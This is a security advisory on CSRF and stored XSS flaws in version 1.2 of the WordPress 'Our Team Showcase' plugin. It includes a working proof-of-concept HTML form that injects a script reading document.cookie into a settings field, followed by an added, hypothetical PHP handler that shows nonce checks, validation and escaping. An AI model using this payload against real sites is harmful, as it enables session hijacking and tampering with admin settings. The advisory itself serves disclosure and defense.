Title: WordPress 'Our Team Showcase' plugin - CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/our-team-enhanced/
Notified WordPress: 2014/11/27

----------------------------------------------------------------
## Description:
----------------------------------------------------------------

This plugin allows you to add, edit, search and display your team members on any page, or in a widget, quickly and easily. It comes with a couple of different styles to choose from.

- Re-order team members with a simple drag & drop.
- Output your team members anywhere with the shortcode [our-team].
- Boosts SEO with schema.org markup.

----------------------------------------------------------------
## CSRF:
----------------------------------------------------------------

It is possible to change the plugin's admin settings by tricking a logged-in admin into visiting a crafted page: the settings form is submitted without any request token (nonce) tied to the admin's session.

----------------------------------------------------------------
## Stored XSS:
----------------------------------------------------------------

Some settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.

PoC: Log in as admin and then submit the following form.

```html
<form method="POST" action="http://[DOMAIN]wp-admin/edit.php?post_type=team_member&page=sc_team_settings" enctype="multipart/form-data">
  <input type="text" name="sc_our_team_template" value="grid"><br />
  <input type="text" name="sc_our_team_social" value="yes"><br />
  <text>sc_our_team_member_count: </text>
  <input type="text" name="sc_our_team_member_count" value="-1"><script>alert(document.cookie);</script>"><br />
  <input type="text" name="sc_our_team_save" value="Update"><br />
  <input type="submit">
</form>
```

----------------------------------------------------------------
## Solution
----------------------------------------------------------------

Update to version 1.3.
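For reference, the shape of a settings handler that closes both issues above: a WordPress nonce bound to the admin's session (defeats the CSRF) plus strict validation on save and escaping on output (defeats the stored XSS). This is an added, hypothetical example written for this advisory, not the plugin's code or its 1.3 fix; the field names come from the PoC form, while the function names, nonce action name and the set of allowed templates are assumptions.

```php
<?php
// Hypothetical hardened settings handler (added example, not the plugin's code).
// Field names match the advisory's PoC; function and nonce names are assumed.

// Render the form with a nonce so a forged cross-site POST cannot be replayed.
function ots_example_render_settings_form() {
    $count    = (int) get_option( 'sc_our_team_member_count', -1 );
    $template = get_option( 'sc_our_team_template', 'grid' );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'ots_example_save_settings', 'ots_example_nonce' ); ?>
        <!-- esc_attr() on output: stored values can never break out of the attribute -->
        <input type="text" name="sc_our_team_template"
               value="<?php echo esc_attr( $template ); ?>">
        <input type="text" name="sc_our_team_member_count"
               value="<?php echo esc_attr( $count ); ?>">
        <input type="submit" name="sc_our_team_save" value="Update">
    </form>
    <?php
}

// Save handler: capability check, nonce check, then strict per-field validation.
function ots_example_save_settings() {
    if ( empty( $_POST['sc_our_team_save'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies if the nonce is missing or invalid, which is what the vulnerable
    // version lacks: a crafted page cannot produce a valid nonce for the victim.
    check_admin_referer( 'ots_example_save_settings', 'ots_example_nonce' );

    // Template: accept only known values, never arbitrary text (allowed set assumed).
    $allowed_templates = array( 'grid', 'list' );
    $template = sanitize_text_field( wp_unslash( $_POST['sc_our_team_template'] ?? '' ) );
    if ( in_array( $template, $allowed_templates, true ) ) {
        update_option( 'sc_our_team_template', $template );
    }

    // Member count: an integer cast keeps only the leading number, so the PoC's
    // value -1"><script>...</script> is stored as just -1.
    $count = (int) ( $_POST['sc_our_team_member_count'] ?? -1 );
    update_option( 'sc_our_team_member_count', $count );

    // Yes/no flag: normalise to exactly 'yes' or 'no'.
    $social = ( ( $_POST['sc_our_team_social'] ?? 'no' ) === 'yes' ) ? 'yes' : 'no';
    update_option( 'sc_our_team_social', $social );
}
```

Validating on save and escaping on output are both needed: the cast stops the payload from being stored, and esc_attr() protects the admin page even if a bad value reached the database some other way.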